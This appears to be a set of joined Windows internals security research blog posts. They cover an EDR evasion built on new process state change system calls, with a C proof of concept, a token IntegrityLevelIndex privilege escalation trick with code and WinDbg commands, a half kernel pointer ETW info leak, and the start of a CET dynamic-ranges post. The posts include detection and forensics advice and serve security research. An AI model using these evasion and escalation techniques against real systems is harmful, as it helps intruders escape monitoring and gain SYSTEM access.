PspThreadStateChangeType has 2 registered procedures – the security procedure, which is SeDefaultObjectMethod and not too interesting to look at in this case as it is the default function, and the delete procedure, which is PspDeleteThreadStateChange. This function will get called every time a thread state change object is destroyed, and does a pretty simple thing:

If the target thread has a non-zero ThreadSuspendCount, the function will resume it as many times as it was suspended. As you can imagine, the process state change object also registers a delete procedure, PspDeleteProcessStateChange, which does something very similar.

New System Calls == New EDR Bypass

This is a nice, if slightly over-complicated, solution to the problem, but it has the unexpected side-effect of creating new and undocumented APIs to suspend and resume processes and threads. Since suspend and resume are very useful operations for attackers wishing to inject code, the well-known NtSuspendThread/Process and NtResumeThread/Process APIs are some of the first system calls that are hooked by security solutions, hoping to detect those attacks.

Having new APIs that perform the same operations without going through the well-known and often-monitored system calls is a great chance for attackers to avoid detection by security solutions that don’t keep up with recent changes (though I’m sure all EDR solutions have already started monitoring these new functions and have been doing so since this build was released. Right…?).

There is still a way to keep those same detections without following all of Microsoft’s recent code changes – even though this feature adds new system calls, the internal kernel mechanism they invoke remains the same. And in Windows 10, this mechanism uses a feature whose sole purpose is to help security solutions gain more information about the system and move them away from relying on user-mode hooks – ETW tracing. More specifically, the Threat Intelligence ETW channel that was added specifically for security purposes. That channel notifies about events that are often interesting to security products, such as virtual memory protection changes, virtual memory writes, driver loads, and, as you probably already guessed, suspending and resuming threads and processes. EDRs that register for these ETW events and use them as part of their detection will not miss any event due to the new state change APIs, since these events will be received in either case. Those that don’t use them yet should probably open some Jira tickets that will be forgotten until this technique is found in the wild.

1 EDR Bypass + Windows Internals = 2 EDR Bypasses

However, this feature does create another interesting EDR bypass. As I mentioned, the suspended process or thread will automatically be resumed when the state change object gets destroyed. Normally, this would happen when the process that created the object either closes the only handle to it or exits – this automatically destroys all open handles held by the process. But an object only gets destroyed when all handles to it are closed and there are no more references to it. This means that if another process has an open handle to the state change object it won’t get destroyed when the process that created it exits, and the suspended process or thread won’t be resumed until the second process exits. This shouldn’t happen under normal circumstances, but if a process duplicates its handle to a state change object into another process, it can safely exit without resuming the suspended process or thread.

But why would a process want to do that?

The ETW events that report that a process is being suspended or resumed contain a process ID of the process that performed the action – this way the EDR that consumes the event can correlate different events together and attribute them to a potentially malicious process. In this case, the PID would be the ID of the process in whose context the action happened. So let’s say we create a process that suspends another process through a state change object, then duplicates the handle into a third process and exits. The process state change object doesn’t get destroyed yet, since there is still a running process with an open handle to it. Only when that other process exits does the duplicated handle get closed and the suspended process get resumed. But since the resume action happened in the context of the second process, which had nothing to do with the suspend action, that is the PID that will appear in the ETW event.

So, in this proposed scenario, a process will get suspended and later resumed, and ETW events will still be thrown for both actions. But these events will have happened in the context of 2 different processes so they will be difficult to link together, and it will be even more difficult to attribute the resume action to the first process without knowledge of this exact scenario. And we can be even smarter – a lot of security products ignore operations that are attributed to certain system processes. This makes sense, since those processes are not expected to be malicious but might have suspicious-looking activity, so it is easier to ignore them unless there is clear indication of code injection, to avoid false positives.

So we can even choose an innocent-looking Windows process to duplicate our handle into, to maximize the chances that the resume operation will be ignored completely. We just need to find a process that we can open a handle to and that will terminate at some point, to resume our suspended process.

Finally, Code!

In this PoC I simply create 2 notepad.exe processes. One will be suspended using a state change object, and the other will have the handle duplicated inside it. Then the PoC process exits but the suspended notepad remains suspended until the other notepad process is terminated:

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

EXTERN_C_START
NTSTATUS
NtCreateProcessStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ PVOID ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Unknown
    );

NTSTATUS
NtChangeProcessState (
    _In_ HANDLE StateChangeHandle,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Action,
    _In_ PVOID ExtendedInformation,
    _In_ SIZE_T ExtendedInformationLength,
    _In_ ULONG64 Reserved
    );
EXTERN_C_END

//
// From earlier in the post - not defined in any public header
//
typedef enum _PROCESS_STATE_CHANGE_TYPE
{
    ProcessStateChangeSuspend = 0,
    ProcessStateChangeResume = 1,
    ProcessStateChangeMax = 2,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

int main ()
{
    HANDLE stateChangeHandle;
    PROCESS_INFORMATION procInfo;
    PROCESS_INFORMATION procInfo2;
    STARTUPINFOA startInfo;
    BOOL result;
    NTSTATUS status;

    stateChangeHandle = nullptr;

    //
    // Zero everything so the cleanup path doesn't act on garbage
    // handles if process creation fails
    //
    ZeroMemory(&procInfo, sizeof(procInfo));
    ZeroMemory(&procInfo2, sizeof(procInfo2));
    ZeroMemory(&startInfo, sizeof(startInfo));
    startInfo.cb = sizeof(startInfo);
    result = CreateProcessA("C:\\Windows\\System32\\notepad.exe",
                           NULL,
                           NULL,
                           NULL,
                           FALSE,
                           0,
                           NULL,
                           NULL,
                           &startInfo,
                           &procInfo);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo.hThread);
    result = CreateProcessA("C:\\Windows\\System32\\notepad.exe",
                           NULL,
                           NULL,
                           NULL,
                           FALSE,
                           0,
                           NULL,
                           NULL,
                           &startInfo,
                           &procInfo2);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo2.hThread);

    status = NtCreateProcessStateChange(&stateChangeHandle,
                                        MAXIMUM_ALLOWED,
                                        NULL,
                                        procInfo.hProcess,
                                        0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating process state change. Status: 0x%x\n", status);
        goto Exit;
    }
    //
    // Action == 0 means Suspend
    //
    status = NtChangeProcessState(stateChangeHandle,
                                  procInfo.hProcess,
                                  ProcessStateChangeSuspend,
                                  NULL,
                                  0,
                                  0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed changing process state. Status: 0x%x\n", status);
        goto Exit;
    }

    result = DuplicateHandle(GetCurrentProcess(),
                             stateChangeHandle,
                             procInfo2.hProcess,
                             NULL,
                             NULL,
                             TRUE,
                             DUPLICATE_SAME_ACCESS);
    if (result == FALSE)
    {
        printf("Failed duplicating handle: 0x%x\n", GetLastError());
        goto Exit;
    }

Exit:
    if (procInfo.hProcess != NULL)
    {
        CloseHandle(procInfo.hProcess);
    }
    if (procInfo2.hProcess != NULL)
    {
        CloseHandle(procInfo2.hProcess);
    }
    if (stateChangeHandle != NULL)
    {
        CloseHandle(stateChangeHandle);
    }
    return 0;
}

Like a lot of other cases, this feature started out as a well-intentioned attempt to solve a minor system issue. But an over-engineered design led to multiple security concerns and whole new EDR evasion techniques which turned the relatively small issue into a much larger one.

Exploiting a “Simple” Vulnerability, Part 2 – What If We Made Exploitation Harder?

Introduction

In a previous post I went over vulnerability CVE-2020-1034, which allows an arbitrary increment of an address, and saw how we can use some knowledge of ETW internals to exploit it, give our process SeDebugPrivilege and create an elevated process. In this post I will build on that exercise and make things harder by adding some restrictions, to see how we can bypass them and still get the result we want – privilege escalation from a low or medium IL process to a system-level one.

New Limitations

The exploit I wrote in part one works just fine, but let’s imagine that a new limitation is added to the kernel that doesn’t let us increment Token.Privileges.Enabled directly, for example by making it a read-only field except for the specific kernel code that is meant to modify it.

So, how can we enable a privilege without incrementing the address ourselves?

Enabling Privileges

The answer to that question is pretty simple – we enable them just like a process enables any other privilege that it owns but is disabled – through RtlAdjustPrivilege, or its advapi32 wrapper – AdjustTokenPrivileges. But here we face a problem: when we try calling RtlAdjustPrivilege to enable our newly-added SeDebugPrivilege, we get back STATUS_PRIVILEGE_NOT_HELD.

To understand why this is happening, we’ll have to take a look inside the very ugly and not very readable kernel functions that are in charge of enabling privileges in a token. To enable a privilege, RtlAdjustPrivilege uses the system call NtAdjustPrivilegesToken, which calls the function SepAdjustPrivileges. This function first checks whether the process is running with high, medium or low integrity level. If it has high IL, it can enable any privilege that it owns. However, if it’s running with medium IL, we reach the following check:

Each requested privilege is checked against this constant value, representing the privileges that medium IL processes are not allowed to enable. The value of SeDebugPrivilege is 0x100000 (1 << 20), and we can see it’s one of the denied options, so it cannot be enabled by a process running below high integrity level. If we choose to run our process as low IL or in an AppContainer, those cases have similar checks with even more restrictive values. As usual, the easy options failed early. However, there are always ways around these problems, we just need to look a bit deeper into the operating system to find them.

Fake EoP Leading to Real EoP

We need to have a high or System-IL process to enable debug privilege, but we were planning to use our new debug privilege to elevate ourselves (or our child process, to be exact) to System… So, we’re stuck, right?

Wrong. We don’t actually need a high or system-IL process, just a high or system-IL token. A process doesn’t always have to use the token it was created with. Threads can impersonate any token they have a handle to, including ones with higher integrity levels. Still, to do that we will need a handle to a process with higher IL than us, in order to duplicate its token and impersonate it. And to open a handle to such a process we’ll need to already have some privilege we don’t have, like debug privilege… and we’re stuck in a loop.

But as I learned from the many lawyers in my family (we are a good Jewish family after all, and no one wanted to be a doctor so we had to compensate) – every loop has a loophole, and this one is no different. We don’t need a handle to the token of a different process if we can cheat and create a token that matches the requirements ourselves!

To understand how that is possible we need to learn a bit about the Windows security model and how integrity levels work. To convince you to get through another 500 words of internals information I’ll tell you that Alex and I showed this idea to James Forshaw and he thought it was cool. And if he thinks it’s cool that should be a good enough reason for you to read through my rants until I finally circle back to the actual idea. And now to some internals stuff:

Tokens, Integrity Levels and Why an Unprotected Array is an Exploiter’s Best Friend

To check the integrity level of a token we need to look at a field named IntegrityLevelIndex inside the TOKEN structure. We can dump it for our process and see what it contains:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex : 0xe [Type: unsigned long]

Like the name suggests, this value on its own doesn’t tell us much because it’s only an index inside an array of SID_AND_ATTRIBUTES structures, pointed to by the UserAndGroups field. We can verify this by looking at SepLocateTokenIntegrity, which is called by SepAdjustPrivileges to determine the integrity level of the token whose privileges it’s adjusting:

This array has multiple entries, the exact number of which changes between different processes. We can tell how many using the UserAndGroupCount field:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount : 0xf [Type: unsigned long]
dx -g *((nt!_SID_AND_ATTRIBUTES(*)[0xf])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)

This is cool and everything, but what does this actually mean and how does it help us fix our broken exploit?

Like the name suggests, a SID_AND_ATTRIBUTES structure contains a security identifier (SID) and specific attributes for it. These attributes depend on the type of data we’re working with; in this case we can find the meaning of these attributes here. The SID part of the structure is the one telling us which user and groups this token belongs to. This piece of information determines what integrity level the token has and what it can and cannot do on the system. For example, only some groups can have access to certain processes and files, and in the previous blog post we learned that most GUIDs only allow certain groups to register them. SIDs have the format S-1-X-…, which makes them easy to identify.

We can improve our WinDbg query to show all the groups that our token is a part of in a convenient format:

dx -s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0xf])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

The entry that our token is pointing to, at index 0xe, is the last one in the table, and it’s the SID for medium integrity level, which is the reason we can’t enable our debug privilege. However, the design of this system gives us a way to bypass our integrity level issue. The UserAndGroups field points to the array, but the array itself is allocated immediately after the TOKEN structure. And it is not the last thing in this memory block. If we dump the TOKEN structure we can see that right after the UserAndGroups field there is another pointer to an array of the same format, called RestrictedSids:

[+0x098] UserAndGroups    : 0xffffad8914e1e4f0 [Type: _SID_AND_ATTRIBUTES *]    
[+0x0a0] RestrictedSids   : 0x0 [Type: _SID_AND_ATTRIBUTES *]

Restricted tokens are a way to limit the access that a certain process or thread will have by only allowing the token to access objects whose ACL specifically allows access to that SID. For example, if a token has a restricted SID for “Bob”, then the process or thread using this token can only access files if they explicitly allow access to “Bob”. Even if “Bob” is part of a group that is allowed to access the file (like Users or Everyone), it will be denied access unless the file “knows” in advance that “Bob” will try to access it and adds the SID to its ACL. This capability is sometimes used in services to restrict their access only to objects that are necessary for them to use and reduce the possible attack surface. Restricted tokens can also be used to remove default privileges from a token that doesn’t need them. For example, the BFE service uses a write restricted token. This means it can have read access to any object, but can only get write access to objects which explicitly allow its SID:

There are two important things to know about restricted tokens that make our elevation trick possible:

  1. The array of restricted SIDs is allocated immediately after the UserAndGroups array.

  2. It is possible to create a restricted token for any SID, including ones that the process doesn’t currently have.

These 2 facts mean that even as a low or medium IL process, we can create a restricted token with a high IL SID and impersonate it. This will add a new SID_AND_ATTRIBUTES entry to the RestrictedSids array, immediately after the UserAndGroups array, where it can be treated as one more entry in the UserAndGroups array. The current IntegrityLevelIndex points to the last entry in the UserAndGroups array, so one little increment of the index will make it point to the new high IL restricted SID. How lucky are we to have an arbitrary increment vulnerability?

Let’s try this out. We use CreateWellKnownSid to create a WinHighLabelSid, then use CreateRestrictedToken to create a new restricted token with a high IL SID and impersonate it:

HANDLE tokenHandle;
HANDLE newTokenHandle2;
PSID pSid;
PSID_AND_ATTRIBUTES sidAndAttributes;
DWORD sidLength = 0;
BOOL bRes;

//
// Call CreateWellKnownSid once to check the needed size for the buffer
//

CreateWellKnownSid(WinHighLabelSid, NULL, NULL, &sidLength);

//
// Allocate a buffer and create a high IL SID
//

pSid = malloc(sidLength);
CreateWellKnownSid(WinHighLabelSid, NULL, pSid, &sidLength);

//
// Create a restricted token and impersonate it
//

sidAndAttributes = (PSID_AND_ATTRIBUTES)malloc(sizeof(SID_AND_ATTRIBUTES));
sidAndAttributes->Sid = pSid;
sidAndAttributes->Attributes = 0;

bRes = OpenProcessToken(GetCurrentProcess(),
                        TOKEN_ALL_ACCESS,
                        &tokenHandle);

if (bRes == FALSE)
{
    printf("OpenProcessToken failed\n");
    return 0;
}

bRes = CreateRestrictedToken(tokenHandle,
                             WRITE_RESTRICTED,
                             0,
                             NULL,
                             0,
                             NULL,
                             1,
                             sidAndAttributes,
                             &newTokenHandle2);

if (bRes == FALSE)
{
    printf("CreateRestrictedToken failed\n");
    return 0;
}

bRes = ImpersonateLoggedOnUser(newTokenHandle2);
if (bRes == FALSE)
{
    printf("Impersonation failed\n");
    return 0;
}

Now let’s look at our thread token and its groups. Notice that we are impersonating this new token, so we need to check the impersonation token of our thread, as our primary process token is not affected by any of this:

dx -s @$token = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

dx new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}
new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}

GroupsCount      : 0xf [Type: unsigned long]
UserAndGroups    : 0xffffad890d5ffe00 [Type: _SID_AND_ATTRIBUTES *]
RestrictedCount  : 0x1 [Type: unsigned long]
RestrictedSids   : 0xffffad890d5ffef0 [Type: _SID_AND_ATTRIBUTES *]
IntegrityLevelIndex : 0xe [Type: unsigned long]

UserAndGroups still has 0xf entries and our IntegrityLevelIndex is still 0xe, like in the primary token. But now we have a restricted SID! I mentioned earlier that because of the memory layout we can treat this restricted SID as an additional entry in the UserAndGroups array, so let’s test that. We’ll try to dump the array the same way we did before, but pretend it has 0x10 entries:

dx -s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0x10])@$token->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

And it works! It looks as if there are now 0x10 valid entries, and the last one has a high IL SID, just like we wanted.

Now we can run our exploit like we did before, with two small changes:

  1. All changes need to use our current thread token instead of the primary process token.

  2. We need to trigger the exploit twice – once to increment Privileges.Present to add SeDebugPrivilege and another time to increment IntegrityLevelIndex to point to entry 0xf.

Nothing ever validates that the IntegrityLevelIndex is lower than UserAndGroupCount (and if something did, we could use the same vulnerability to increment that as well). So, when our new impersonation token points to a high IL SID, SepAdjustPrivileges thinks that it is running as a high IL process and lets us enable whichever privilege we want. After making the changes to the exploit we can run it again and see that RtlAdjustPrivilege returns STATUS_SUCCESS this time. But I never fully believe the API and want to check for myself:

Or if you prefer WinDbg:

dx -s @$t0 = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

1: kd> !token @$t0 -n
_TOKEN 0xffffad89168c4970
TS Session ID: 0x1
User: S-1-5-21-2929524040-830648464-3312184485-1000 (User:DESKTOP-3USPPSB\yshafir)
User Groups:
...
Privs:
19 0x000000013 SeShutdownPrivilege               Attributes -
20 0x000000014 SeDebugPrivilege                  Attributes - Enabled
23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
25 0x000000019 SeUndockPrivilege                 Attributes -
33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
34 0x000000022 SeTimeZonePrivilege               Attributes -
Authentication ID:         (0,2a084)
Impersonation Level:       Impersonation
TokenType:                 Impersonation
...
RestrictedSidCount: 1      
RestrictedSids: 0xffffad89168c4ef0
Restricted SIDs:
00 S-1-16-12288 (Label: Mandatory Label\High Mandatory Level)
Attributes - Mandatory Default Enabled
…

Our impersonation token has SeDebugPrivilege, just like we wanted. Now we can do what we did last time and run an elevated cmd.exe under the DcomLaunch service. You might wonder if we really need to do that, now that we have a high IL token. But restricted tokens are still not really regular tokens, and we will probably face some issues if we try to run as a fake elevated process using a restricted token. It might also look a little suspicious to anyone who might be scanning our process, so it’s best to create a new process that can run as SYSTEM without any tricks.

Forensics

This trick we’re using is pretty cool, not only because it lets us cheat the system but also because it’s pretty hard to detect. The biggest tell for anyone looking for it would be that the IntegrityLevelIndex is outside the bounds of the UserAndGroups array, but even if someone is checking for that, it’s easy enough to trigger the vulnerability one more time and increment UserAndGroupCount as well. That is still detectable if you calculate the end address of the UserAndGroups array based on the count and compare it with the start address of the RestrictedSids array, seeing that they don’t match. But this is a very specific detection that is probably overkill for a very uncommon technique.

A second way to find this is to search for threads impersonating restricted tokens. This is pretty uncommon and when I run this query the only process that comes up is my exploit:

dx @$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
@$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
[0x279c]         : exploit_part_2.exe [Switch To]

But this is a very targeted search that will only find this very specific case. And anyway, it’s easy enough to avoid by making the thread revert back to its original token after the privilege is enabled. This is generally a good practice – don’t let your exploit keep “suspicious” attributes for longer than necessary, to minimize possible detections. However, all the forensic ideas I mentioned in the previous blog post still work in this case – we’re using the same vulnerability and triggering it the same way, so we still register a new ETW provider that no one else uses and leave occupied slots that can never be emptied without crashing the system. So if you know what to look for, this is a pretty decent way to find it.

And of course, there is the fact that a Medium IL process suddenly managed to grab SeDebugPrivilege, open a handle to DcomLaunch and create a new reparented, elevated process. That would (hopefully) raise some flags for a couple of EDR products.

Conclusion

This post described a hypothetical scenario where we can’t simply increment Privileges.Enabled in our process token. We currently don’t need all these fancy tricks, but they are very cool to find and exploit, sort of like a DIY CTF, and maybe one day they will turn out to be useful in another context. These tricks clearly show that the token contains lots of interesting fields that can be used in various ways, and how a single increment and some internals knowledge can take you a long way.

Since the token is this vulnerable and doesn’t tend to change very often, maybe it’s time to protect it better, for example by moving it to the Secure Pool?

In this post and the previous one I ended up grabbing SeDebugPrivilege and using a reparenting trick to create a new elevated process. In a future post that might happen one day, I will look at some other privileges that are mostly ignored in the exploitation field and can be used in new and unexpected ways.


The full PoC for this technique can be found here.


Exploiting a “Simple” Vulnerability – Part 1.5 – The Info Leak

Introduction

This post is not actually directly related to the first one and does not use CVE-2020-1034. It just talks about a second vulnerability that I found while researching ETW internals, which discloses the approximate location of the NonPaged pool to (almost) any user. The research was spurred by a tweet that challenged me to find an information leak – and it turns out I found one that wasn’t actually patched after all!

The vulnerability itself is not especially interesting, but the process of finding and understanding it was fun so I wanted to write about that. Also, when I reported it Microsoft marked it as “Important” but would not pay anything for it and eventually marked it as “won’t fix” even though fixing this issue takes less time than writing an email, so the annoyance factor alone makes writing this post worth it. And this is a chance to rant about some more ETW internals stuff which didn’t really fit into any of the other posts, so you can read them or skip right to the PoC, your choice.

Update

This vulnerability was eventually acknowledged by Microsoft and received CVE-2021-24107. It was fixed on 9/3/2021.

More ETW Internals!

Remember that the first thing you learn about ETW notifications is that they are asynchronous? Well, that was a lie. Sort of. Most ETW notifications really are asynchronous. However, in the previous blog post we used a vulnerability that relied on improper handling of the ReplyRequested field in the ETWP_NOTIFICATION_HEADER structure. The existence of this field implies that you can reply to an ETW notification. But no one ever told you that you can reply to an ETW notification – how would that even work?

Normally, ETW works just the way you were told. That is the case for all Windows providers, and any other ETW provider I could find. But there is a “secret setting” that kicks in when someone notifies an ETW provider with ReplyRequested = 1. Then, as we saw in the previous blog post, the notification gets added to a reply queue where it waits for a reply. Remember, there can only be four queued notifications waiting for a reply at any moment. When that happens, any process which registered for that provider has its registered callback notified and has a chance to reply to the notification using EtwReplyNotification. When someone replies to the notification, the original notification gets removed from the queue and the reply notification gets added to the reply queue.

The only case I could see so far where a reply is sent to a notification is immediately after a GUID is enabled – sechost!EnableTraceEx2 (which is the standard way of registering a provider and enabling a trace) has a call to ntdll!EtwSendNotification with EnableNotificationPacket->DataBlockHeader.ReplyRequested set to 1. That creates an EtwRegistration object, so before returning to Sechost, Ntdll immediately replies to the notification with NotificationHeader->NotificationType set to EtwNotificationTypeNoReply, simply to get it removed from the notification queue.

Specifically, in this case, something a little more complicated happens. Even though Ntdll is enabling the GUID, it’s not the “owner” of the registration instance and therefore doesn’t have a registered callback (since this belongs to whoever registered the provider). Yet Ntdll still needs to know when the kernel enables the provider, to queue the reply notification – it can’t expect the caller to know that this needs to be done. So to do this, it uses a trick.

When EtwRegisterProvider is called, it calls EtwpRegisterProvider. The first time this function is called, it calls EtwpRegisterTpNotificationOnce:

Without getting into too many internal details about waits and the thread pool, this function essentially creates an event, registers a thread-pool wait on it with EtwpNotificationThread as the callback, and then calls NtTraceControl with an Operation value of 27 – an undocumented and unknown value. Looking at the kernel side of things, it’s not too hard to give this value a name:

I’ll call this operation EtwAddNotificationEvent.

EtwpAddNotificationEvent is a pretty simple function: it receives an event handle, grabs the event object, and sets EventDataSource->NotificationEvent in the EPROCESS of the current process to the event (or NotificationEventWow64, if this is a WoW64 process). Since this field is a pointer and not a list, it can only contain one event at a time. If this field is not set to 0, the value won’t be set and the caller will receive STATUS_ALREADY_REGISTERED as a response status.
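The register-once behavior described above can be sketched in a few lines of C. The struct, enum and function names here are illustrative stand-ins (the real field lives in the EPROCESS and the real failure status is STATUS_ALREADY_REGISTERED):

```c
#include <stddef.h>

/* Illustrative stand-in for the per-process ETW notification state. */
typedef struct {
    void *NotificationEvent;  /* a single pointer, not a list */
} PROCESS_ETW_STATE;

enum reg_status { REG_OK, REG_ALREADY_REGISTERED };

/* Only the first registration wins; a second event can't be set until
   the field is cleared. */
static enum reg_status add_notification_event(PROCESS_ETW_STATE *proc, void *event)
{
    if (proc->NotificationEvent != NULL)
        return REG_ALREADY_REGISTERED;
    proc->NotificationEvent = event;
    return REG_OK;
}
```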

Then, in EtwpQueueNotification, immediately after a notification is added to the notification queue for the process, this event is signaled:

The event being signaled makes EtwpNotificationThread run, since it was registered to wait on this event, so it is, in a way, an ETW notification callback that is notified whenever the process receives an ETW notification. However, this function is not a real ETW notification callback, so it doesn’t receive the notification as any of its parameters and has to somehow get it by itself in order to reply to it. Luckily, it has a way to do that.

The first thing that EtwpNotificationThread does is make another call to NtTraceControl, this time with operation number 16 – EtwReceiveNotification. This operation leads to a call to EtwpReceiveNotification, which chooses the first queued notification for the process (matching the process’ WoW64 status) and returns it. This operation requires no input arguments – it simply returns the first queued notification. This gives EtwpNotificationThread all the information that it needs to reply to that last queued notification quietly, without disturbing the unaware caller that simply asked it to register a provider. After replying, the event is set to a waiting state again, to wait for the next notification to arrive.

Most of this pretty long explanation has nothing to do with the vulnerability, which really is pretty small and simple and can be explained in a much less complicated way. But I did say this post was mostly an excuse to dump some more obscure ETW knowledge in the hope that one day someone other than me will read it and find it helpful, so you all knew what you were getting into.

And now that we have all this unnecessary background, we can look at the vulnerability itself.

The InfoLeak

The issue is actually in the last part we talked about – returning the last queued notification. If you remember from the last post, when a GUID is notified and the notification header has ReplyRequested == 1, this leads to the creation of a kernel object which will be placed in the ReplyObject field of the notification that is later put in the notification queue. And this is the same structure that can be retrieved using NtTraceControl with EtwReceiveNotification operation… Does that mean that we get a free kernel pointer by calling NtTraceControl with the right arguments?

Not exactly. To be precise, you get half of a kernel pointer. Microsoft didn’t completely ignore the fact that returning kernel pointers to user-mode callers is a bad idea, like they did in so many other cases. The ReplyObject field in ETWP_NOTIFICATION_HEADER is in a union with ReplyHandle and RegIndex. And after copying the data to the user-mode buffer, they set the value of RegIndex, which should overwrite the kernel pointer that is in the same union:

The only thing that this code doesn’t account for is the fact that ReplyObject and RegIndex don’t have the same size: ReplyObject is a pointer (8 bytes on x64) while RegIndex is a ULONG (4 bytes). So setting RegIndex only removes the bottom half of the pointer, leaving the top half to be returned to the caller:
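The truncation is easy to reproduce in plain C with a miniature of the same union (x64 sizes, little-endian; the helper function name is mine):

```c
#include <stdint.h>

/* Miniature of the union inside ETWP_NOTIFICATION_HEADER. */
typedef union {
    uint64_t ReplyHandle;   /* ULONGLONG */
    void    *ReplyObject;   /* 8-byte pointer on x64 */
    uint32_t RegIndex;      /* ULONG - only 4 bytes */
} REPLY_FIELD;

/* Models the kernel's "sanitization": store a kernel pointer, then
   overwrite RegIndex. On a little-endian machine only the low 32 bits
   are replaced, so the top half of the pointer survives. */
static uint64_t sanitize_like_the_kernel(uint64_t kernel_ptr, uint32_t reg_index)
{
    REPLY_FIELD f;
    f.ReplyHandle = kernel_ptr;
    f.RegIndex = reg_index;
    return f.ReplyHandle;
}
```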

Triggering this is extremely simple and includes exactly three steps:

  1. Register a provider
  2. Queue a notification where ReplyObject is a kernel object – do this by calling NtTraceControl with operation == EtwSendDataBlock and ReplyRequested == TRUE in the notification header.
  3. Call NtTraceControl with operation == EtwReceiveNotification and get your half of a kernel pointer.

It’s true that the top half of a kernel address is not all that much, but it can still give a caller a better guess of where the NonPagedPool (where those objects are allocated) is found. In fact, since the NonPagedPool is sized 16TB (or 0x100000000000 bytes), this vulnerability tells us exactly where the NonPaged pool is, and we can validate that in the debugger:

!vm 21
...
System Region               Base Address    NumberOfBytes
SecureNonPagedPool    : ffff838000000000       8000000000
KernelShadowStacks    : ffff888000000000       8000000000
PagedPool             : ffff8a0000000000     100000000000
NonPagedPool          : ffff9d0000000000     100000000000
SystemCache           : ffffb00000000000     100000000000
SystemPtes            : ffffc40000000000     100000000000
UltraZero             : ffffd40000000000     100000000000
Session               : ffffe40000000000       8000000000
PfnDatabase           : ffffe78000000000      c8000000000
PageTables            : fffff40000000000       8000000000
SystemImages          : fffff80000000000       8000000000
Cfg                   : fffffaf0ea2331d0      28000000000
HyperSpace            : fffffd0000000000      10000000000
KernelStacks          : fffffe0000000000      10000000000

Since this can be triggered by almost any user, including Low IL and AppContainer – where most of the classic infoleaks don’t work anymore – it might be of some use, even if a limited one.
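Turning the leaked value into a guess about the pool is just a matter of masking. A sketch, where the leaked value is made up for illustration:

```c
#include <stdint.h>

/* The leak returns the top 32 bits of a NonPaged pool pointer in place of
   RegIndex, with the bottom half replaced. Masking off the bottom half
   gives a 4GB-granularity guess at where the leaked object lives. */
static uint64_t pool_region_guess(uint64_t leaked_reply_field)
{
    return leaked_reply_field & 0xffffffff00000000ULL;
}
```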

I believe that when this code was introduced, it was completely safe – those areas of the code are pretty ancient and get very few changes. This code was probably introduced in the days before x64, when the size of a pointer and the size of a ULONG were the same, so setting RegIndex did overwrite the whole object address. When x64 changed the size of a pointer, this code was left behind and never updated to match, and this bug appeared.

This makes you wonder what similar bugs might exist in other pieces of ancient code that even Microsoft forgot about?

Just Show Me the Code Already!

In case you want to see the three lines of code that trigger this bug, you can find them here.

CET Updates – Dynamic Address Ranges

In the last post I covered one new addition to CET – relaxed mode. But as we saw, there were a few other interesting additions. One of them is CetDynamicApisOutOfProcOnly, which is the one I will be covering in this post and which was also backported to 20H1 and 20H2.

But before I explain the flag, let’s talk about the mechanism that it mitigates.

Dynamic Enforced Address Ranges

As we know, Microsoft’s implementation of hardware CET prevents a process from setting the instruction pointer to non-approved values through backward-edge (“return”) flows, including through OS-provided mechanisms – whether by returning to an address that’s different from the one in the shadow stack, setting the thread context, or unwinding to an unexpected address during exception handling. But like we’ve seen in the last two posts, there are cases that require special handling. One of those is dynamically generated (JIT) code.

Such code doesn’t always follow the rules and assumptions of CET, so Microsoft added a way to handle its needs, similar to the handling of Dynamic Exception Handler Continuation Targets, which I talked about in the first post. In this solution, a process can declare some ranges as “CET compatible” such that setting the instruction pointer to any address within that range won’t trigger a CET exception (#CP) that will crash the process.

To keep those ranges, the EPROCESS received a new field:

typedef struct _EPROCESS
{
    ...
    /* 0x0b18 */ struct _RTL_AVL_TREE DynamicEHContinuationTargetsTree;
